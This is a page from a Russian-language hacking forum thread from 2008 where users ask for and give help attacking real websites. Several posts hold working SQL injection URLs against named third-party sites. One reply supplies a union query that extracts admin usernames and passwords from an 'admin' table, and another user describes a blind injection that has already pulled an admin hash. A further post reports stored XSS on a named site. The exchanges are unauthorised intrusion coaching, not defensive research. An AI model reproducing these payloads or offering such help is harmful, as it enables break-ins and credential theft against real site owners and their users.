HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 297 из 2422 « Первая < 197247287 293 294 295 296 297 298 299 300 301 3073473977971297 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.08.2008, 16:39
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Если джумла то md5($pass.$salt)
 
Ответить с цитированием

  #2  
Старый 17.08.2008, 19:17
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию
помогие со скулей
http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,3,4,5,6,7,8,9,0,1/*
нимогу ни версию ни всего остольного получить
 
Ответить с цитированием

  #3  
Старый 17.08.2008, 19:22
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
SVAROG
http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,UNHEX(HEX(version())),4,5,6,7, 8,9,0,1/*
 
Ответить с цитированием

  #4  
Старый 17.08.2008, 20:29
georgich
Новичок
Регистрация: 19.06.2008
Сообщений: 12
Провел на форуме:
30356

Репутация: 1
По умолчанию
Вот хотел узнать, как можно узнать адрес админки? Ну, а потом, если повезет, то и багу какую-нибудь для доступа к сайту. Буду очень признателен за инфу. Спасибо.
 
Ответить с цитированием

  #5  
Старый 17.08.2008, 21:03
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
Провел на форуме:
39796

Репутация: -3
Отправить сообщение для Elephant с помощью ICQ Отправить сообщение для Elephant с помощью MSN Отправить сообщение для Elephant с помощью Yahoo
По умолчанию
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11+from+gtaco m_gta.tables+where+TABLE_NAME=users,12,13,14,15,16 ,17,18,19,20/*

Что я неправельно сделал?

Мне надо из базы посмотреть названия таблиц, а я немогу((((9
 
Ответить с цитированием

  #6  
Старый 17.08.2008, 21:13
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию
0_о
Это пипец какой-то. Я покушал валидола, успокоился и отвечаю, запрос апсолютна нихрена неправильный - это раз. Во - вторых версия мускула 4, имена всех таблиц ты никак не увидишь, только перебор таблиц -
Код:
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
И вот тебе бонус -
Код:
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
Читай маны, а то после еще одного такого поста у мну инфаркт случится
Последний раз редактировалось 0nep@t0p; 17.08.2008 в 21:26..
 
Ответить с цитированием

  #7  
Старый 17.08.2008, 21:33
extrem0
Новичок
Регистрация: 16.08.2008
Сообщений: 2
Провел на форуме:
3851

Репутация: 0
По умолчанию
http://site.com/account/index.php?n=shops&shop=9+and+ascii(substring((SELE CT+concat(username,0x3a,password)+from+account+lim it+0,1),1,1))>51

Ситуация такова: веб-сервер с мускулом 5, нашел уязвимость . Знаю названия: базы,таблиц,колонок. Посредством слепой иньекции выудил логин(username) и хэш(password) админа из таблицы account (см. выше)

Вопрос:
Т.к. не удается сбрутить хэш ( хэш из пароля видимо получается в несколько неизвестных шагов,а не просто "sha1(password)"), возник вопрос. Как модифицировать в этой же таблице "account" значение в колонке "banned" с 1 на 0 ?
Последний раз редактировалось extrem0; 17.08.2008 в 21:35..
 
Ответить с цитированием

  #8  
Старый 17.08.2008, 21:38
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
 
Ответить с цитированием

  #9  
Старый 17.08.2008, 21:52
extrem0
Новичок
Регистрация: 16.08.2008
Сообщений: 2
Провел на форуме:
3851

Репутация: 0
По умолчанию
Цитата:
Сообщение от 0nep@t0p  
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
Понятно... А существует ли иной способ модификации инфы(через php например) ?
 
Ответить с цитированием

  #10  
Старый 18.08.2008, 02:43
Cry Wolf
Новичок
Регистрация: 18.07.2008
Сообщений: 12
Провел на форуме:
99313

Репутация: 3
Отправить сообщение для Cry Wolf с помощью ICQ
По умолчанию
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?

Вот ссылка http://gayby.org/news/comments/192.html
 
Ответить с цитированием
Ответ
Страница 297 из 2422 « Первая < 197247287 293 294 295 296 297 298 299 300 301 3073473977971297 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ